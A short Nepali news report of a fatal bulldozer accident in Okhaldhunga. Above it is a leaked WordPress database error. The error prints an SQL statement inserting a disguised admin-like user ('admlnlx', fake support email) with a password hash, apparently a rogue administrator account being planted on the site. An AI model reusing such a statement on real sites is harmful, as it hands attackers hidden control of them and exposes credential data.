WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/.eoCYMvA4ef8daAejLAJt4FD2Dmv0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 23:42:49', '', 'admlnlx', 'admlnlx')
ओखलढुंगा, फागुन ३ –
ओखलढुंगामा डोजरले किचेर एक जनाको ज्यान गएको छ । मंगलबार दिउँसो घडेरी सम्याउने क्रममा खिजीफलाटेका ४५ वर्षका ज्ञानबहादुर सुनुवारको ज्यान गएको हो ।
डोजर घुमाउँदा बकेटले किचेर सुनुवारको घटनास्थलमै ज्यान गएको हो । चालक रामेछापमा बुद्धिबहादुर मोक्तानलाई नियन्त्रणमा लिएर अनुसन्धान थालेको प्रहरीले जनाएको छ ।